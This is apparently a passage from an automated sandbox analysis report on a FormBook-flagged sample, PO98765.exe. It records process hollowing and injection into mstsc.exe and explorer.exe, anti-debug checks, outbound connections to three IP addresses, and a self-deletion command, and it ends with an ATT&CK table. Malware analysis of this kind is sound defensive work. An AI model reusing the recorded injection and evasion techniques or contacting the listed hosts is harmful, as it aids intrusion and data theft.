          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05186CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05104F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05104F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05118794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05138E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05117E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05148EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05109100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05124120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05124120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0512C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05187016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0511B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05120050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05120050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05109080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05183884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05183884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0519B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05133B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05133B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0510DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_0513B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05132397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051C138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051BD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05111B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05111B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051D5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_05134BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 3_2_051303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO98765.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\PO98765.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 160.122.150.218 80
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\PO98765.exe Memory written: C:\Users\user\Desktop\PO98765.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\PO98765.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO98765.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PO98765.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\PO98765.exe Thread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3424
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\PO98765.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\PO98765.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 1070000
          Source: C:\Users\user\Desktop\PO98765.exe Process created: C:\Users\user\Desktop\PO98765.exe C:\Users\user\Desktop\PO98765.exe
          Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO98765.exe'
          Source: explorer.exe, 00000002.00000000.682188809.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.696913420.0000000005E50000.00000004.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.682566937.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.923963210.0000000003990000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.700351269.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Users\user\Desktop\PO98765.exe VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO98765.exe Code function: 0_2_05BA62D8 GetUserNameA,
          Source: C:\Users\user\Desktop\PO98765.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000002.923055372.0000000000F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.923022023.0000000000F10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.679040055.0000000003741000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.715786451.0000000001040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.922790825.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.715956692.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.714949083.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 1.2.PO98765.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.PO98765.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          (Trailing digits after a technique name are the report's signature-hit counts for that technique; empty cells are columns with no further technique at that row.)

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
          Valid Accounts | Windows Management Instrumentation 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 331 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | LSASS Memory | Virtualization/Sandbox Evasion 14 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 14 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 4 | DCSync | System Information Discovery 112 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
